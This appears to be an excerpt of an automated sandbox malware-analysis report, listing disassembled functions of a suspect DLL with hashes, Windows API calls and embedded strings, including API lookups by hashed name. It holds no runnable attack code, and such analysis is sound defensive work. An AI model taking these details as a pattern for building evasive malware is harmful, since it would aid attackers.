                                            • Instruction ID: a9a98cdcee67ddc9e36aa7238f58da83a1aac5b0ec7fdedd0a0529bea73c0d85
                                            • Opcode Fuzzy Hash: f0a18cab4314490ccaa43067e97fa5d8848d085afbd12ab1cfa09f5444af4287
                                            • Instruction Fuzzy Hash: 474196317002059BD714DE5CDCE096EB3AAEB82358BA4092EE4A1CBA41D771D855C7A3
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 68964BDC
                                            • VariantInit.OLEAUT32(?), ref: 68964BE5
                                            • VariantInit.OLEAUT32(?), ref: 68964BEB
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 68964BF6
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 68964C2A
                                            • VariantClear.OLEAUT32(?), ref: 68964C37
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68965107
                                            • VariantClear.OLEAUT32(?), ref: 68965117
                                            • VariantClear.OLEAUT32(?), ref: 6896511D
                                            • VariantClear.OLEAUT32(?), ref: 68965123
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 2515392200-0
                                            • Opcode ID: 4aeda5a16adce807b9731ce7183d969bb0278f22aaf9abce8dd6fccd7722db7a
                                            • Instruction ID: a0a551626f5563dcf52d361ec81c96bb5b31369e23772774fcb1ab706a4fed91
                                            • Opcode Fuzzy Hash: 4aeda5a16adce807b9731ce7183d969bb0278f22aaf9abce8dd6fccd7722db7a
                                            • Instruction Fuzzy Hash: EB12F575615705AFC718DB98DD84DAEB3B9BF8C300F544668F50AABB91CA30F841CB50
                                            APIs
                                            • VariantInit.OLEAUT32(689C05A8), ref: 689649EE
                                            • VariantInit.OLEAUT32(?), ref: 689649F7
                                            • VariantInit.OLEAUT32(?), ref: 689649FD
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 68964A08
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 68964A39
                                            • VariantClear.OLEAUT32(?), ref: 68964A45
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68964B66
                                            • VariantClear.OLEAUT32(?), ref: 68964B76
                                            • VariantClear.OLEAUT32(?), ref: 68964B7C
                                            • VariantClear.OLEAUT32(689C05A8), ref: 68964B82
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 2515392200-0
                                            • Opcode ID: 0131da507bace11d0fca4921f6855f8d603aadf534e62bffb82527fd14abe254
                                            • Instruction ID: efe5147a6035b7fb9ca645c1ee6d9f6d4873d2aa711dbfdb78db66b1647f8349
                                            • Opcode Fuzzy Hash: 0131da507bace11d0fca4921f6855f8d603aadf534e62bffb82527fd14abe254
                                            • Instruction Fuzzy Hash: 08516A72A00219AFDB14CFA4CC84EAEBBBCFF99314F444169E915AB244D735E941CFA0
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896480C
                                            • VariantInit.OLEAUT32(?), ref: 68964815
                                            • VariantInit.OLEAUT32(?), ref: 6896481B
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 68964826
                                            • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6896485B
                                            • VariantClear.OLEAUT32(?), ref: 68964868
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68964974
                                            • VariantClear.OLEAUT32(?), ref: 68964984
                                            • VariantClear.OLEAUT32(?), ref: 6896498A
                                            • VariantClear.OLEAUT32(?), ref: 68964990
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 2515392200-0
                                            • Opcode ID: d97dd6d77b748b07a1a021f893f257e96c5688e2544fc5f1e9fe3afdd78207d5
                                            • Instruction ID: 5fdfe7000bf83b0547115f243759dbdabcd88c2baa0d1b15e4dcc31e3e5a8d0c
                                            • Opcode Fuzzy Hash: d97dd6d77b748b07a1a021f893f257e96c5688e2544fc5f1e9fe3afdd78207d5
                                            • Instruction Fuzzy Hash: BA514772A04209EFDB14DFA8C884EAEB7B9FF99314F54456DE505AB240D730E941CFA0
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6895DD00
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6895DD10
                                            • SafeArrayPutElement.OLEAUT32(00000000,68962FFF,?), ref: 6895DD47
                                            • VariantClear.OLEAUT32(?), ref: 6895DD4F
                                            • SafeArrayPutElement.OLEAUT32(00000000,68962FFF,?), ref: 6895DD6D
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6895DDA4
                                            • VariantClear.OLEAUT32(?), ref: 6895DDAC
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6895DE16
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6895DE27
                                            • VariantClear.OLEAUT32(?), ref: 6895DE31
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                            • String ID:
                                            • API String ID: 3525949229-0
                                            • Opcode ID: 6a50f185609a1b7d43e1075b87d86affcb42e76c009e5b77a9127fdae59236e1
                                            • Instruction ID: 7f19fe073d45c62b57373c1475a1307e9e9b939e00d37ad31edcb9283793e357
                                            • Opcode Fuzzy Hash: 6a50f185609a1b7d43e1075b87d86affcb42e76c009e5b77a9127fdae59236e1
                                            • Instruction Fuzzy Hash: 04513C75A04609AFDB10DFA5C884EDEBBB8FF9A700F018129EA15A7350DB35D905CBA1
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6897C213
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                            • API String ID: 1823113695-1254974138
                                            • Opcode ID: cdb25e337d008f5411d2602aead215311a2f4b041877402d2243316e09f73fc9
                                            • Instruction ID: 4c0c2897ceebf240489705a10d44c9168eb107a63b3656a40a9afa4fb6f783ad
                                            • Opcode Fuzzy Hash: cdb25e337d008f5411d2602aead215311a2f4b041877402d2243316e09f73fc9
                                            • Instruction Fuzzy Hash: 089185B5A00209AFCB18CF59DC84EAEB7B9EB98314F44861DE919DB340D730FA04CB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 2168136238-4289949731
                                            • Opcode ID: 087f7253d28d01b1e1b9a8121272d30dd22f5a00f4d67b3c6d67476e48169aa6
                                            • Instruction ID: f55d28b882b25095ab23bc088fa70e7a302f40e10ff3bce79217b235bbebdd95
                                            • Opcode Fuzzy Hash: 087f7253d28d01b1e1b9a8121272d30dd22f5a00f4d67b3c6d67476e48169aa6
                                            • Instruction Fuzzy Hash: BC51D8327002059BD724CE1CE890A6FB7EBEBC5318BA0462EE855C7784D771ED658793
                                            APIs
                                            • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 68971C5E
                                            • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 68971C69
                                            • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 68971CA2
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 68971CC1
                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 68971CCC
                                            • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 68971D0A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AddressHandleLibraryLoadModuleProc
                                            • String ID: User32.dll$kernel32.dll
                                            • API String ID: 310444273-1965990335
                                            • Opcode ID: 7dcf7ae8c00d3ab4e5a1bbcfecce8f76bfc8ae0350586b46f6802f55e8d2a583
                                            • Instruction ID: a0e7d468307ddebe62bb9a952607b7afe69a577e142bcf5ab0a2c058881289d2
                                            • Opcode Fuzzy Hash: 7dcf7ae8c00d3ab4e5a1bbcfecce8f76bfc8ae0350586b46f6802f55e8d2a583
                                            • Instruction Fuzzy Hash: A2615A78204B00DFD730CF58C596A6ABBF6FF56710FA08958D4968BA42D736F856CB80
                                            APIs
                                            • UnDecorator::getArgumentList.LIBCMT ref: 689B442E
                                              • Part of subcall function 689B3FC9: Replicator::operator[].LIBCMT ref: 689B404C
                                              • Part of subcall function 689B3FC9: DName::operator+=.LIBCMT ref: 689B4054
                                            • DName::operator+.LIBCMT ref: 689B4487
                                            • DName::DName.LIBCMT ref: 689B44DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                            • API String ID: 834187326-2211150622
                                            • Opcode ID: a81cf456aca8f33fd0a3eedfcf6f99a856501a7be43341af6d7247bc9ff75851
                                            • Instruction ID: 0014daa9caec7bf997c4adbbbfd88f607380b23db588e0750bfd91cc55326e7e
                                            • Opcode Fuzzy Hash: a81cf456aca8f33fd0a3eedfcf6f99a856501a7be43341af6d7247bc9ff75851
                                            • Instruction Fuzzy Hash: 5C219DB0214209AFCF11CF58C48896E7FF9AF4A79DB808195E899CB212CB71D903DF50
                                            APIs
                                            • UnDecorator::UScore.LIBCMT ref: 689B5D40
                                            • DName::DName.LIBCMT ref: 689B5D4C
                                              • Part of subcall function 689B3B3B: DName::doPchar.LIBCMT ref: 689B3B6C
                                            • UnDecorator::getScopedName.LIBCMT ref: 689B5D8B
                                            • DName::operator+=.LIBCMT ref: 689B5D95
                                            • DName::operator+=.LIBCMT ref: 689B5DA4
                                            • DName::operator+=.LIBCMT ref: 689B5DB0
                                            • DName::operator+=.LIBCMT ref: 689B5DBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                            • String ID: void
                                            • API String ID: 1480779885-3531332078
                                            • Opcode ID: cfb0f8a5232aa5471924c192d37d7f28af5ccb414030ad40b56bdb70267690d0
                                            • Instruction ID: 206bda383f85c8122a93d47e05d30d6a5d39787a5d0d43f5c5aae5204a7306fe
                                            • Opcode Fuzzy Hash: cfb0f8a5232aa5471924c192d37d7f28af5ccb414030ad40b56bdb70267690d0
                                            • Instruction Fuzzy Hash: 3411C274500248AFDB04DF78C888BBF7FB49F91308F804198D055AB291DB70DA46CB41
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896C88F
                                            • VariantInit.OLEAUT32(?), ref: 6896C895
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896C8A0
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6896C8D5
                                            • VariantClear.OLEAUT32(?), ref: 6896C8E1
                                            • std::tr1::_Xweak.LIBCPMT ref: 6896CB1C
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896CB39
                                            • VariantClear.OLEAUT32(?), ref: 6896CB49
                                            • VariantClear.OLEAUT32(?), ref: 6896CB4F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1774866819-0
                                            • Opcode ID: 158a493cf66a667f98390f9d27b1c96f47c071b691314559093bb82d7802db02
                                            • Instruction ID: 36b41a3f6327e0d4a32bded4eb7c97691433f715ea91be1742112d769cc7e3d9
                                            • Opcode Fuzzy Hash: 158a493cf66a667f98390f9d27b1c96f47c071b691314559093bb82d7802db02
                                            • Instruction Fuzzy Hash: DAB158756006099FCB14DFA8C884DAEB7F9BF8D310F54856DE50AAB791CA34F941CB60
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 68963F7B
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68963F8D
                                            • VariantInit.OLEAUT32(?), ref: 68963FB7
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68963FD0
                                            • VariantClear.OLEAUT32(?), ref: 689640C9
                                            • VariantClear.OLEAUT32(?), ref: 68964105
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 68964123
                                            • VariantClear.OLEAUT32(?), ref: 68964157
                                            • VariantClear.OLEAUT32(?), ref: 68964168
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                            • String ID:
                                            • API String ID: 758290628-0
                                            • Opcode ID: 4e75bef25cfe40f0d343577d01eb769acaa639df363791d2044d30ee43cbbfad
                                            • Instruction ID: 206fbc242b1f80b9407be7e30de3e12a17574dbee3cf3ab6d974f130689d7f9b
                                            • Opcode Fuzzy Hash: 4e75bef25cfe40f0d343577d01eb769acaa639df363791d2044d30ee43cbbfad
                                            • Instruction Fuzzy Hash: 17716A762083419FD710DFA8C8D495BBBE8BBA9314F904A2DF5A587250C731E989CF92
                                            APIs
                                            • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,513F6A41), ref: 6894FC98
                                            • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,513F6A41), ref: 6894FCAD
                                            • CloseHandle.KERNEL32(?,?,?,00000000,513F6A41), ref: 6894FCB7
                                            • SetLastError.KERNEL32(00000000,?,?,00000000,513F6A41), ref: 6894FCBA
                                            • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,513F6A41), ref: 6894FD01
                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,513F6A41), ref: 6894FD14
                                            • GetLastError.KERNEL32(?,?,00000000,513F6A41), ref: 6894FD2A
                                            • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,513F6A41), ref: 6894FD6B
                                            • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,513F6A41), ref: 6894FD98
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
